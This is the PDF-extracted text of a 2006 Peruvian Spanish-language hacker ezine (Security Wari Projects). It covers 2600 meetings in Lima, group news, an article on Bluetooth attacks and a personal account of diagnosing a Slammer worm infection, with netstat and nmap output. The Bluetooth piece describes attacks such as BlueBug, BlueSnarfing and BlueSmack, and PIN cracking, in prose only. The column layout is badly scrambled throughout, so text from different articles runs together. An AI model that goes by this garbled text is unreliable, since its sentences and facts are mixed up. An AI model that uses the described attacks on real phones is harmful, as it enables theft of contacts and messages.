Está en la página 1de 23

S E C U R I T Y W A R I P R O J E C T S

SWP
Security Wari Projects
Luego de un largo letargo, los miembros de SWP y la gente de la scene decidimos
preparar esta edición especial para ustedes, nuestros lectores y amigos.

Edición ... anual? Edición especial - Julio 2006

Bluetooth-La Amenaza El hombre que saltaba Como armar tu propio Introducción al Anál- autobiografía esta Relato preparado
Azul en un solo pie Todo en 1 isis forense para abo- historia llega a su fín. originalmente para
Aírtculo escrito por un Articulo escrito por Esta vez Xav|ce nos gados y afines Con que nos irá Raregazz.
buen amigo argentino ReYDeS sobre una de trae muestra como es Interesante artículo sorprender HaCKsPy Página 15
Ezequiel Sallis en el sus experiencias con posible crear tu propio traido por nuestro esta vez
que nos habla de esa caja negra al que amigo ReYDeS con un Página 10 Seguridad en servi-
CD de instalación de dores *nix LAMP
seguridad en todos llaman Windows. Multi OS’s enfoque “diferente” UNt Crack UNt Hack
bluetooth, un MUST Página 5 Página 7 Página 9
ReYDeS nos trae un Renkho nos trae un
READ. Se los La vida de un Geek relato de una intrusión paper sobre lineamien-
recomiendo. 2da y 3ra Parte (y a los servidores de una tos generales de seguri-
Final) Universidad. dad en linux.
Página 3 Luego de 8 años de
iniciada esta especie de Página 21
Gráfico extaído de Slashdot

el primer viernes de cada mes, lastimosamente en ban ahí y con eso fue suficiente. Cosas sencillas
Perú no se hacían. como que, las reuniones son públicas por lo que
Reuniones 2600 en Lima Perú deben ser realizadas en un lugar público, es nece-
Escrito por HaCKsPy sario informar sobre lo acontecido en las reunio-
nes, cuantas personas fueron, que temas se trata-
ron, si hubo algún problema, entre otras cosas.

Y bueno, fue así como luego de encontrar el local


Quien diria que algún día en el Perú aficionados y
(tienen idea de lo difícil que es encontrar un local)
entendidos en los temas de seguridad podríamos
un viernes en la noche, donde no te obliguen a
sentarnos y reunirnos a compartir anécdotas, aventuras
consumir, se pueda conversar, y esté en un lugar
y experiencias. Pues si, de algunos meses atrás el primer
digamos céntrico. Y fue así como luego de muchos
viernes de cada mes está reservado para muchos
problemas y cambios de locales, ahora organiza-
“chicos”, grandes y pequeños para este fin.
mos las reuniones en un local llamado parribar.
Que son las reunas 2600 Aquí una foto de los originales, los silbatos Por que el 1er Viernes de cada mes
Permitanme explicarles, 2600 es un número repre- del cereal Captain Crunch, aquellos que
Según la justificación de 2600, dicen que si es que
sentativo para muchos que como yo venimos ali- generaban la frecuencia 2600 Hz alguna organización internacional quisiera hacer
mentándonos de este mundo ávido de conoci-
una cacería de brujas, tendría que invertir en tener
miento. Hace algunos años un personaje quien se
personal en todos los países al mismo tiempo para
hace llamar Captain Crunch (Si, igual que el cereal)
Como asi la idea de hacerlas en el Peru realizar algún tipo de actividad. Como dice el
encontró que los silbatos que venían de regalo en
dicho “Si quieren celete que les cueste”.
las cajas de cereal, adivinan de cual?, permitián
En mayo del 2005 swp fué invitado al I Congreso
realizar llamadas gratuitas por los teléfonos públi- Así que ya saben, el 1er Viernes de cada mes si
Internacional de Hackers (CIH2K5) que se realizó
cos de AT&T, debido a que generaban una frecuen- estás en Lima-Perú, date una vuelta por Parribar,
en Santa Cruz - Bolivia. Yo tuve la suerte de viajar
cia, esta frecuencia era 2600 Hz. mayores informes en:
allá. Fué ahí donde conocí a Buanzo quien me
Años mas tarde aparece en USA una revista lla- comentó que él organizaba las reuniones en Ar-
http://www.swp-scene.org/
mada 2600, revista hecha por hackers por y para gentina. Le consulté que habíá que hacer, y íue así
“la familia” ;). Artículos diversos en una revista como empezó lo de las reuniones 2600 en Perú, no Por lo general durante la semana del 1er Viernes
impresa a 5 dólares cada ejemplar (si.. ouch...) era muy difícil, sólo era necesario entrar a la web pueden encontrar información detallada de la
de 2600 http://www.2600.com/ y en la sección reunión. Nos vemos…
Alguna vez tuve acceso a una de estas revistas, me meetings seguir con los lineamientos que indica-
encontré con que hacían reuniones en varios países - HaCKsPy

Lo que hagas en la vida, tendrá eco en la eternidad. 1


S E C U R I T Y W A R I P R O J E C T S

Que nos ha pasado estos últimos años


Luego de nuestra última edición oficial hemos sido víctimas de nuestro día a día,
victimas de nuestros trabajos, problemas internos, ha habido de todo como en
bodega, aquí un resumen de lo acontecido en ese tiempo.
Linux Security Day - Lima CIH2K5 - Santa Cruz Bolivia sultorio Informático", fué a alguna vez tienen la oportu- endo Wardriving por los
Nuestros amigos del Plug Congreso Internacionel de hablar sobre temas de se- nidad de viajar por allá no se alrededores jeje ;)...
(Peruvian Linux User Group) Hackers que se realizó en el guridad. Fué la primera vez arrepentirán ;) .
organizaron por el año 200X Hotel Tajibos en Sta. Cruz según entiendo que alguno InfoSecurity
un evento de seguridad que Bolivia por el mes de Mayo de los muchachos fué pre- Evento del Grupo DNET iSEC organizó el infosecurity,
sin pensar congregó a casi de 2006, participaron cole- sentándose como alguien del Evento que se realizó por el 4 días de charlas de seguri-
toda la comunidad Under. gas de Argentina, Bolivia, under informático. Hablando mes de abril de este año dad, workshops, Cissp Day y
Nuestro colega ReYDeS vino Colombia, Estados Unidos y de seguridad y de como ven tuvieron temas de seguridad charlas de ethical hacking,
a lima de expositor. Un día por Perú participó nuestro las empresas a los hackers de información, wireless, no son comunes los eventos
de seguridad charlas compañero HaCKsPy, gratos en el mercado laboral, opin- prograómacin de celulares, de esa magnitud en Lima
anécdotas y la continuamos momentos, kilos de conoci- iones sobre la conciencia de virus entre otros temas. Un lastimosamente, pero en-
en la noche en casa de neo- miento, buenos amigos, seguridad en el Perú. asiduo participante de la lista contramos algunas caras
plus, por ahí crackman tuvo harto licor y diversión por las preparó un resumen para conocidas ocultas bajo la
la genial idea de llevar a su noches, una experiencia sin V COREIS - Tingo María nosotros el cual pueden seriedad de un terno, o una
amigo policía sin avisar. igual. Congreso Regional de Estu- entcontrar en nuáestra pgina vestimenta formal. Ezequiel
Ahora nos reimos de eso… diantes de Ing. de Sistemas web, en el siguiente link: Sallis, quien también cola-
jajaja… pero aún no lo per- HaCKsPy en la radio al cual nuestro colega http://www.swp-scene.org/? boró con esta edición, es-
donamos :p Así como lo leen, HaCKsPy HaCKsPy fue invitado como q=node/124 tuvo dictando el CISSP day y
fué invitado a un programa expositor a Tingo María Intentamos ir, pero llegamos el taller de ethical hacking.
de Radio Local llamdo "Con- hablando de cómo realizar tarde y nos quedamos haci-
un análisis de seguridad. Si

Nuestra Editorial Miembros


Cinco años... acabo de percatarme que nuestro grupo; el grupo Alonso Caballero — ReYDeS (reydes@gmail.com)
SWP; transcurre su quinto año de existencia, oficialmente Dennys Ato — CraCkman (dennysato@gmail.com)
hablando. Cinco años, y la tipica frase tantas veces mencionada Johan Skywalker — Sicario (uzisuicida@gmail.com)
recae a mi mente; “que rapido se pasan los años”. Si, el tiempo Juan Quiñe — HaCKsPy (hackspy@gmail.com)
es implacable y certero; cuando involucra a los seres humanos. Miguel Zumarán — Darkbicho (Inactivo)
Rolando Anton — Renkho (renkho@gmail.com)
Han pasado mas de dos años, desde aquel Junio del 2004, en
que se publico nuestra eZine numero cinco. Dificil resumir dos Colaboradores y amigos
años, en poco mas de 10 lineas. Aunque pueda interpretarse
como una blasfemia a la capacidad de sintesis; puedo resumir Xav|ce (Perú), Int3l (Perú), Pibe (Perú), Simulator (Argen-
estos dos años para nosotros como: “Nuestro fortalecimiento”. tina), Buanzo (Argentina), Hernan Racciatti (Argentina),
Y no solo en el sentido de vigorosidad o de ser mas fuertes; entiendase como la confirma- Shadown (Argentina), Xonico(Argentina), Diemay (Co-
cion de “Lo que somos como grupo SWP”. lombia), Sha0 (España).

Ya añoraba escribir una editorial, hace dos años que no era posible. Agredecemos a todos
los miembros y colaboradores que han hecho posible la realizacion de esta edicion especial Como ubicarnos
de SWP 6, y lo mas importante; agradecer a todos ustedes; nuestros lectores; por esta alli, Escribenos a:
pendientes de nosotros.
Securitywariprojects@gmail.com

Visitanos en:
Muchas gracias.
http://www.swp-scene.org/

O inscribete en nuestra lista:


“Es bello comprender las efectos,
http://groups.google.com/group/swp-scene/
de las causas que alguna vez renegaste...”
Revista hecha en el Perú

2 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

HABLANDO DE HACKING Cuando se conectan más de un dispositivo BT


Bluetooth La amenaza Azul compartiendo un mismo canal, de comunicación
Quería en esta oportunidad dirigirme a Escrito por Ezequiel Sallis forman una red denominada Piconet. Dichas redes
aquellos chicos que están empezando en este están compuestas por un dispositivo Master quien
impone la frecuencia de saltos para la Piconet , y
mundo de la informática y para ser mas
todos los demás dispositivos son los denominados
específicos en la seguridad informática. Este artículo nos llega como un aporte de un buen Slaves (esclavos). Las Piconet solo pueden aceptar
Desde ya les advertimos que es una vida de amigo Argentino Ezequiel Sallis quien estuvo por hasta 7 dispositivos Slaves conectados
lima hace algunos meses dictando unos talleres
mucha lectura, estudio e investigación. para el CISSP, otros de ethical hacking, y
Alguien me dijo… que para estar en este compartiendo un tiempo en la reunión 2600 del Hasta 7 dispositivos esclavos activos son admiti-
mundo te tenía que gustar… y saben que? primer viernes de Julio. dos en una Piconet pero sin embargo, son soporta-
Tiene razón… creo que si el día de hoy no dos hasta 200 dispositivos pasivos.
Introducción Los dispositivos esclavos pueden a su vez estar
tuviera necesidad de trabajar para vivir…
interconectados a diferentes Piconet, formando lo
saben que haría? Haría lo mismo que hago El Estándar Bluetooth, nacido en 1994 y formali- que se denomina una Scatternet, pero esta carac-
día a día… leer mucho sobre tecnología, zado en 1998, es una tecnología inalámbrica de terística no se aplica al dispositivo Master ya que el
investigar y descubrir cosas nuevas, tartar bajo costo, que opera en la banda no licenciada de mismo solo puede estar en una Piconet.
2.4Ghz de frecuencia (misma banda que utiliza la
de que al final del día sentir que ha sido un tecnología 802.11). Básicamente posee cuatro ca- Seguridad
día provechoso, que cada día se algo nuevo o nales, 3 canales sincrónicos de voz (64 Kbps por Los dispositivos con Bluetooth tienen básicamente
entiendo algo mejor de lo que ayer… canal) y 1 canal de datos asincrónico. La velocidad dos estados o modos posibles
de transmisión de los canales asincrónicos es de • Modo Descubrimiento
Alguien me dijo hace algunos años… LEE… 723,2 Kbps mientras que la del canal asincrónico es • Modo No Descubrimiento
lee todos los días de tu vida, dedícale aunque de 433,9 Kbps.
sea 30 minutos diarios a leer… a leer que? A Uno de los hechos que hacen que esta tecnología Cabe mencionar que si algún dispositivo se en-
sea de bajo costo, es la potencia necesaria para cuentra en modo No Descubrimiento, igualmente
leer lo que quieras… pero lee… eso es lo
funcionar, tan sólo 0,1 Watts que sin duda alguna puede ser mapeado siempre y cuando el atacante
importante. Se los dice alguien que hace reduce considerablemente el consumo de los equi- conozca la Mac Address (BD_ADDR)
algunos años con las Justas leía condorito… pos y que sin duda alguna permitió incorporarla a
pero saben que… hice caso de ese consejo… y los teléfonos celulares y las PDA sin que afecte en Básicamente los modelos de Seguridad de los
al día de hoy no me arrepiento de mi exceso el consumo de sus baterías. dispositivos Bluetooth se clasifican en tres modos
decision, claro que antes me he guiado por primarios:
El Bluetooth permite la comunicación inalámbrica,
principios como… “dormir es para los
entre diferentes dispositivos pero que posean la Modo 1: Sin seguridad (Modo Default)
débiles” o “Dormir es opcional” … ah…. misma tecnología. Sin embargo, en la frecuencia Esencialmente, los mecanismos de autenticación y
Grandes principios… sobretodo durante las que opera (en la banda no licenciada), debió en- cifrado están deshabilidatos
encerronas con una pc (o varias) y algún frentarse al temor elemental de cualquier comuni- Modo 2: Aplicación/ Nivel Servicio
objetivo a cumplir, instalar una distro, cación inalámbrica, la interferencia, y a fin de Ocurre en la capa L2CAP, nivel de servicios.
superarla se implementaron las siguientes carac- Primero se establece un canal entre el nivel LM y el
levantar un servicio, probar una falla,
terísticas: de L2CAP y recién entonces se inicializan los
entender el funcionamiento de una
• Frequency Hoping: Patrón de saltos prede- parámetros de seguridad. Como característica, el
herramienta, desarrollar algo en el lenguaje finido acceso a servicios y dispositivos es controlado por
que sea (por cierto hace mil años que no • Saltos de 1Mhz sobre 79 frecuencias diferentes un Gestor de Seguridad por lo cual variando las
desarrollo … que mal…), analizar un entre 2.402 GHz y 2.480 GHz políticas de seguridad y los niveles de confianza se
código, coger un libro… • Saltos entre frecuencias más rápidos que en pueden gestionar los accesos de aplicaciones con
otras tecnologías inalámbricas (1600 Saltos por diferentes requerimientos de seguridad que operen
Deficiones como el diccionario de Jargon, segundo) en paralelo. Otra característica importante de este
Wikipedia, o algunos libros serios del tema modo es que no hay ninguna codificación adi-
El protocolo BT esta basado en el siguiente Stack: cional de PIN o claves.
nos dan una idea. Que significa ser un
Modo 3: Autenticación vía PIN/ Seguridad a
hacker; A mi concepto (IMHO) creo que me
Es la capa mas baja, define las características de la nivel MAC/ Encripción
quedo con la definición en la que muestran a transmisión, cada dispositivo esta clasificado en tres
clases diferentes: Ocurre a nivel de Link y todas las rutinas se corren
Radio Layer • Clase 1 (hasta 10 centimetros)
un hacker como aquel que piensa fuera de la •Clase 2 (hasta 10 metros)
•Clase 3 (hasta 100 metros )
internamente en el chip BlueTooth por lo que nada
caja. Aquel que busca entender como Es la capa física, provee corrección de errores y
características de seguridad, a través de la encripción
se transmite en texto plano. A diferencia del Modo
Baseband Layer
funcionan las cosas, ya que por ejemplo, al
de datos, también administra los saltos de frecuencia
y los datos contenidos en el header del paquete
2, los procedimientos de seguridad se inician antes
Es el contenedor de aproximadamente 20 PDU
de establecer algún canal y el cifrado se basa en la
entender como funciona un sistema Protocol Data Units, estas unidades son enviadas
desde un dispositivo al otro, algunas de las mas
Link Manager Protocol (LMP) utilizadas son: autenticación PIN y seguridad MAC. Básicamente,
computacional es ahí donde empiezas a •Power Control
comparte una clave de enlace (clave de link)
•Autenticacion
comprender su funcionamiento. El descubrir •Calidad de Sevicio (QOS )
Envía comandos a las capas dos capas inferiores, secreta entre dos dispositivos. Para generar esta
Host Controller Interface permitiendo una vía para la utilización, de las
como es posible burlar la seguridad de un bondades de Bluetooth clave, se usa un procedimiento de “paring”
The Logical Link Control and Controla el link entre dos dispositivos, y además es cuando los dos dispositivos se comunican por
sistema es una consecuencia de este Adaptation Protocol (L2CAP) la encargada de proveer los servicios a los mismos
primera vez.
conocimiento. Ahora, si lo usas para bien o Cable Replacement Protocol
Es el protocolo de transporte, envía la señal montada
(RFCOMM)
para mal, entraría en un tema moral el cual
sobre L2CAP
Busca otros dispositivos Bluetooth disponibles y Paring
Service Discovery Protocol tiene la provee la capacidad de establecer una
no es el fin de esta nota. Sólo les puedo decir (SDP) conexión con los mismos, se comunica directamente
con la capa de L2CAP Para comprender el proceso de Paring o Empare-
Lean mucho, y si decides involucrarte... jamiento, debemos aclarar que por default, la
comunicación Bluetooth no se valida, de manera
recuerda que te tiene que gustar.
Redes tal que cualquier dispositivo puede o podría hab-
HaCKsPy lar con cualquier otro. Un dispositivo Bluetooth se

Lo que hagas en la vida, tendrá eco en la eternidad. 3


S E Q U O I A C L U B

marcación por modem). Como ya mencionamos, tabla ejemplo en el Anexo 1 “BluePrint Device
la forma de autentificarse es mediante códigos PIN Hashes”). Para el caso de los dispositivos que no
(cadena ASCII de hasta 16 caracteres de longitud). se encuentren en Modo Descubrimiento, existen
Tanto el usuario del dispositivo cliente como así herramientas que se basan en ataques de Brute BlueSpam
también el proveedor del servicio, debe introducir Force. Es un ataque basado en la búsqueda de dispositi-
el código PIN, obviamente, en ambos dispositivos vos en Modo Descubrimiento, a los cuales luego
el código ingresado debe ser exactamente el les enviará mensajes arbitrarios creados por el
mismo. Al finalizar este proceso correctamente, BlueBug atacante. Este tipo de ataques no requiere la inter-
ambos dispositivos generan una clave de enlace la Es una vulnerabilidad que fue encontrada en acción por parte de la victima para recibir el spam
cual se puede almacenar en el propio dispositivo o varios teléfonos celulares con interfaz Bluetooth.
en un dispositivo de almacenamiento externo. BlueJacking
Dicha clave será utilizada la siguiente vez que se Permite enviar comandos AT al celular, a través de Es el ataque quizás más inofensivo pero desde el
comuniquen ambos dispositivos sin la necesidad un canal encubierto de la tecnología Bluetooth, cual se han sentado muchas bases para nuevos
de la intervención de los usuarios para que colo- permitiendo al atacante: ataques. Consiste en conectarse a un dispositivo
quen nuevamente sus contraseñas. Si alguno de Bluetooth y colocarle imágenes, mensajes o con-
los dos dispositivos pierde la clave, se debe a real- • Extraer del celular la agenda telefónica y calen- tactos al dueño del dispositivo. También es utili-
izar todo el proceso nuevamente. Todo este dario entre otros zado para realizar ingeniería social y utilizarla en
proceso es conocido como emparejamiento o Par- complemento con otro tipo de ataques que req-
• Modificar o Borrar entradas en el calendario, o
ing. uieran que los equipos estén aparejados.
en los contactos telefónicos
Información Comprometida y Lugares
• Enviar un mensaje SMS desde el celular com-
de Uso Riesgoso Cracking BT PIN
prometido
Tal cual sucede, en 802.11, la implementación de
Es muy común encontrarse en los archivos alma-
• Provocar que el celular comprometido, realice los algoritmos de encripción y seguridad, poseen
cenados en las PDA y en los Celulares, los usuarios
llamadas telefónicas a los números que el ata- importantes debilidades.
y las contraseñas de las PC y hasta de los servi-
cante desee En el caso de Bluetooth, este contiene varios ele-
dores que para no dejarlos anotados en un papel lo
mentos, como el management de llaves de en-
anotan en sus dispositivos móviles.
cripción y autenticación basada en un PIN los
Los lugares de mayor riesgo o donde es fácilmente cuales son utilizados en el proceso de Paring y la
posible obtener información como la mencionada BlueSnarfing utilización de estos reside en la decisión del
anteriormente es en lugares públicos como por Este es el ataque que se aprovecha del bluebug, y usuario.
ejemplo: básicamente permite, extraer información de un El algoritmo que brinda seguridad a estas tec-
celular, en vez de colocarla, varios equipos son
• En el cine nologías es SAFER+, este es un algoritmo simétrico
vulnerables a este ataque (Nokia 6310,6310i y
• En una plaza con mucha gente de encripción por bloque, que permite la utiliza-
varios otros).
• En una biblioteca ción de llaves de 128, 192 y 256, para el caso el
En agosto de 2004, lograron llevar mas allá los
• En un centro comercial o en un bar algoritmo utilizado es Safer+ de 128bits.
limites de alcance de un dispositivo clase uno,
• En un campo de fútbol Entonces, un atacante podría, interceptar el PIN
logrando extraer y modificar la agenda telefónica y
• En alguna tienda de telefonía durante el proceso de paring de dos dispositivos,
el calendario de un teléfono celular a una distancia
• En el tren – autobús para luego poder monitorear toda la conversación
de 1,78 Km. Utilizando una Laptop bajo Linux
Desde principios de 2003, comenzaron a hacerse (Con todas las librerías de Bluetooth), con un El proceso de Cracking de PIN demora 0,06
publicas, algunas debilidades y vulnerabilidades adaptador USB Bluetooth modificado (Clase 1) y Milésimas de segundo en un Pentiun IV 3Ghz (PIN
que afectaban directamente a esta tecnología. una antena direccional cuyo objetivo era un Celu- 4 Dígitos)
La primera de ellas, fue descubierta por la gente de lar Nokia 6310 Dispositivo (Clase 2)
Atstake, y fue denominada War Nibling, y permite Conclusión
descubrir en a todos los dispositivos que esten en Las nuevas tecnologías, traen asociadas cientos de
BlueSmack
el alcance del atacante esten estos en modo descu- riesgos y amenazas para las que muchas veces las
Es un ataque de Denegación de servicio que ap-
brimiento o no. empresas, no esta preparadas, y lo que es peor, a
rovecha las debilidades
Después y de la mano de Adam Laurie y la gente veces ni siquiera estan preparadas
en la implementación de Bluetooth, mas puntual-
del grupo Trifinite, fueron descubiertas las sigui- mente en L2CAP. Permite mal formar un
entes técnicas: Muchas corporaciones, dan a sus directivos estos
requerimiento causando que el dispositivo se cuel-
dispositivos, sin tener en cuenta los riesgos asocia-
gue o se reinicie sin necesidad de establecer un
dos a los que se expone la información contenida
conexión previa.
en ellos, es por esto que hay que crear la conciencia
BluePrinting
necesaria y tomar medidas que permitan mitigar
Es similar al conocido ping de la muerte, l2ping es
Es una técnica de Fingerprinting pero de dispositi- los riesgos asociados.
una funcionalidad que esta presente en las librerías
vos Bluetooth, que permite detectar básicamente
Bluez, de Linux, y permiten a una atacante a espe-
• Fabricante del dispositivo cificar el tamaño del paquete a enviar La creatividad, es una de las herramientas de
• Modelo del dispositivo ataque, contra la que muy pocos desarrollan
contramedidas
Se basa en la dirección Mac Address del disposi- BlueBump
tivo, esta compuesta por 6 bytes, los primeros 3 Su fin es robar la link-key del teléfono de la vic-
indican el fabricante y los restantes el modelo. Referencias:
tima, para establecer posteriores conexiones, sin
www.bluetooth.org
que esta lo note y aparentando ser un dispositivo
www.trifinite.org
confiable. Este tipo de ataque incorpora técnicas
Las herramientas para estos ataques buscan dis-
de Ingeniería social pero fundamentalmente se
positivos que se encuentren en Modo Descu- Ezequiel M. Sallis CISSP/CCNA/NSP
basa en el beneficio de poder regenerar la link-key
brimiento, toma las direcciones Mac, y la compara Senior Security Specialist
mientras la conexión esta establecida
contra la base de firmas que posee determinando Root-Secure
así el Fabricante del dispositivo y su modelo (ver

4 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

• Mira el puerto 1434.... Mire el puerto 1434 /


El hombre que saltaba con un solo pie • Cambiamos; bueno la gran T cambio; todo el UDP. Alli estaba.
cableado del tendido telefonico; pues utilizamos
Escrito por ReYDeS Speedy; de paso que se volaron algunos anexos; ------>
c:\> netstat -an
por no decir conecciones clandestinas.:O)
Primer netstat :)
Creado el 24 / 02 / 2003 emacs :) TCP 127.0.0.1:1240 127.0.0.1:1044 TIME_WAIT
Y modificado en los subsecuentes dias. ;) Lo que falto es que cambiaramos nuestras com- TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1500 0.0.0.0:0 LISTENING

Adaptado para la eZine de SWP putadoras. Y a las personas que laborabamos alli :) ...
...
UDP 0.0.0.0:1108 *:*
UDP 0.0.0.0:1434 *:*

Esto va mas alla del simple y metodico hecho de Pero la coneccion... Seguia igual!. Joder Tio!!!... UDP 0.0.0.0:3456 *:*

Segundo Netstat.
escribir un texto. Ya que todo lo que he escrito
hasta el momento, y plasmado en lineas; son Despues de mirarnos las caras y ver tan solo nues- TCP
TCP
0.0.0.0:7686
127.0.0.1:1433
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING

relativamente hablando; vivencias de indole per- tros estados casi de coma, es momento de pensar TCP
...
127.0.0.1:1500 0.0.0.0:0 LISTENING

sonal. Tratare de hacer esto lo mas liviano posible mas alla. ...
TCP 200.60.2**.***:139 200.60.2**.***:43853 TIME_WAIT
TCP 200.60.2**.***:139 200.60.2**.***:43866 TIME_WAIT
y no saturarlos con largas y tediosas lineas. Al TCP 200.60.2**.***:1433 0.0.0.0:0 LISTENING

menos en este texto. :X Luego nos percatamos de algo cuando desconecta- ..


..
bamos, el server Windows, la intranet a traves de UDP 0.0.0.0:1032
UDP 0.0.0.0:1434
*:*
*:*
UDP 0.0.0.0:3456 *:*
Pero aun asi, como dije siempre; “Nadie os obliga a mi server Linux, podia salir, y viceversa. :P <------

leer esto”; sois libres de hacerlo o no. Aqui vamos...


Hmm... Porque?... La miradas se dirigieron a mi
Gen en SyS Linux!. Y despues de tener que enfrentar estoica- • Mire la version del SQL Server con el Query
mente las crecientes teorias y axiomas de la posib- Analizer. Revise Version y parches aplicados.
Un dia de Enero; de esos que uno prefiere no lidad de la no convivencia de un Linux y un Win-
recordar; toda el area empezaba sus labores acos- dows en la misma intranet; teorias de las cuales me En verdad les digo que jamas me imagine que yo
tumbradas en un ambiente hibrido. Un corte nada encarge de rechazar sin tanto apasionamiento. Se pudiera estar en estos trotes. :P Y jamas habia
anormal del acceso a internet, no levanta mayor procedio a especular por otras. tocado tanto un Advance Server.
sospechas; acostumbrandome ya, a este tipo de
servicio de una empresa transnacional, cuyo nom- Claro que tambien se nos cruzo por la mente la En este punto de la narracion, de seguro ya la gran
bre tambien prefiero no recordar, pero que em- posibilida de estar siendo atacados por “Hackers”; mayoria; sino todos; ya estan intuyendo cual es el
pieza con T. ;) pues la saturacion del router parecia un DoS, pero problema. :) Asi es que para no aletargar mas el
mis logs, vitacoras, no mostraban nada anormal; asunto, aqui esta:
Una caida mas, que importa. Como siempre en excepto escaneos considerados “normales”.
estas situaciones es mejor llamar a personal “califi- Fecha:
cado”. Asi es que despues de ciertas coordinacio- Luego me percate de la saturacion del router, de 25 de Enero del 2003<<
nes con el proveedor de nuestro acceso a internet. un comportamiento casi normal, con una carga de
Teniamos a personal de T, metida en nuestra Area. CPU de 5% u 9%, este se elevava a picos de 54 % Culpable:
Los se~ores de la gran T. Hicieron su diagnostico: provocando que este dejara de responder, y cual MS-SQL Slammer / Sapphire worm / Sapphire /
mejor solucion y magica que desconectar uno de SQL-HELL / Slammer / W32.SQLExp.Worm /
Tenemos un area Hibrida, Un servidor Windows, los 2 servidores para que todo volviera a la nor- W32/SQLSlammer.worm / WORM_SQLP1434.A
y mas windows por alli, unServidor Novell, Aja! malidad y resetear el Server Windows era solo que
Un servidor Linux; empeze a notar algo que nos devolvia el Acceso a internet. Aja!... el punto Comentario Personal:
apuntaba a mi servidor; empece a sentir como entonces iba por el windows. :) Bueno; nunca crei decir esto; pero, que mejor lugar
‘subliminalmente’ iban a coger como un para empezar la busqueda y posible solucion de
punto de la posible falla a mi server Linux. Bueno, Vayan recordando todo esto, pues tal vez ya esten este problema que la pagina de los principales
ese dia despues de ‘percibiendo’, por donde va la situacion. sindicados. Alli vamos. :-O
impresionarme con sus PINGs y consolas cmd en
sus laptops, y de conectarse serialmente para EX o DO PASTEo casi Textualmente algunos fragmentos.
“diagnosticar” la linea y el estado de nuestro ya
muchas veces marginado Router. El problema Bien, como en toda historia, siempre algo pseudo- PSS Security Response ha publicado esta alerta
parecio solucionarse; pues se han fijado que gener- inesperado ocurre; el jefe del Area tuvo que dejarla para informar a sus clientes sobre el W32 Slammer
almente NO fallan cuando el Tecnico esta presente por un viaje ya planificado, e inpostergable. Asi es worm, el cual... (etc)
:o) Eso deberia ser un caso de estudio. que la situacion no podia seguir asi, imaginense
resetear el server Win, cada vez que ocurria esto. Y Bene!. Vamos a la fuente... a la real. ;)
Asi es que, como supondran; minutos y horas a nadie se le ocurria otra causa del problema.
despues nuevamente nos quedamos sin acceso a Haber que dice Microsoft:
internet; entonces decidimos ver “Que esta A Poca LIP SyS
pasano, ON?”. Aqui esta un peque~o resumen de http://www.microsoft.com/security/slammer.asp
todo lo que hicimos: Me propuse averiguar que es lo que ocurria, y
como no soy ni por asomo, DOCTO en Materias de Despues de una rapida y chocante Lectura, me
Windows. Consulte a mis Buenos Amigos de ‘mando’ a la siguiente url:
• Cambiamos las tarjetas de Red. 3com, D-link;
eso parecia una feria de tarjetas. :O) RareGaZz; cabe mencionar que en el TEAM hay
muy buenos amigos que conocen sobre temas http://www.microsoft.com/technet/treeview/?ur
Windows. Y cierto dia de Febrero cuya fecha tam- l=/technet/security/virus/alerts/slammer.asp
• Uniformizamos, las velocidades, a 10Mbps a
100Mbps - Half Duplex, Full Duplex, etc. ;) Al poco recuerdo. Mi Amigo NEO; al cual doy publi-
menos en mi linux un ./mii-diag o un ./mii-tool cos agradecimientos; me dio una posible causa, Aqui me detalla todo los Productos afectados.
:) consecuencia de los sintomas. Diantres!, aqui si que las cosas se ven negras; por
• Instalado el SQL Server... Mire el SQL server... no decir ‘oscuras’. ;)
Instalado y Funcionando.
• Cambiamos y testeamos cables UTP, incluido
conectores rj45. :o)

Lo que hagas en la vida, tendrá eco en la eternidad. 5


S E C U R I T Y W A R I P R O J E C T S

Definimos al gusano?. Hmmmm... con esos nom- Acto seguido y tras la avalancha de ‘sintomas’ Los sabios consejos se reiteran aqui:
bres; que le pusieron; vamos al grano, y hablemos indicativas de la presencia de este gusano, solo era
un poco de el. cuestion de bajar algun programa de la red que 1. Bloquear trafico Saliente al puerto UDP 1434.
confirmara su presencia en el sistema. 2. Tambien bloquear trafico entrante al mismo
Lo que mas me llamo la atencion de este gusano; puerto.
obviamente; dejando de lado que ataca al MS SQL http://vil.nai.com/viłstinger/
Server Monitor, es: Los logs de este firewall, me fueron mostrando las
En la url anterior se halla una utilidad para detec- acciones tanto externas e internas del gusano; y me
• El SQŁSlammer ataca una vulnerabilidad de tar virus o gusanos especificos, entre ellos obvia- mostraron que NO solo era una Maquina la infec-
desbordamiento de pila. A mi me parece genial!; mente el mecionado. Asi es que esto no hizo mas tada sino 2 o 3 mas, las cuales tenian el SQL Server
bueno, ahora me parece genial; pues es resi- que confirmar su presencia. Activo. Para confirmar, llamemos a nuestro amigo
dente en memoria. nmap.
Fuck!!!... :D
• Utiliza el puerto 1434 protocolo UDP, no orien- ------>
[root@******* root]# nmap -sU -v -p 1434 -oN 1434
tado a la coneccion. Como resultado es mucho Confirmada feacientemente la presencia indese- 192.168.1.1-254
mas veloz en su propagacion. Esto provoca un able de este simpatico gusano >:|. Gracias nueva- The 1 scanned port on (192.168.1.1) is: closed
Interesting ports on (192.168.1.2):
DoS, en los dispositivos afectados, ya que gen- mente a los consejos de mi Amigo Neo, procedi a Port State Service
1434/udp open ms-sql-m
era ingentes cantidades de trafico para su tomar medidas al respecto.
propagacion. The 1 scanned port on (192.168.1.4) is: closed
Interesting ports on (192.168.1.5):
• Instalar un Firewall mientras me bajaba los Port
1434/udp
State
open
Service
ms-sql-m
• En su fase de propagacion no solo afecta IP’s livianos parches y de esta manera poder con-
The 1 scanned port on (192.168.1.6) is: closed
publicas, sino tambien IP’s privadas, en mi caso trolar al Gusanito; hasta cari~o le tome; :O) Para The 1 scanned port on (192.168.1.12) is: closed
Interesting ports on (192.168.1.13):
192.168.1.0/24 :) este proposito utilize el Tiny Personal Firewall. Port State Service
1434/udp open ms-sql-m

The 1 scanned port on (192.168.1.23) is: closed


Bueno, esos 3 acapites me parecen estupendos. ;) http://www.tinysoftware.com/home/tiny2?la=E The 1 scanned port on (192.168.1.24) is: closed
N ...
...
Ahora hablemos sobre el gusano en si. ...
The 1 scanned port on (192.168.1.91) is: closed
El cual es de facil instalacion y configuracion. Interesting ports on (192.168.1.98):
Port State Service
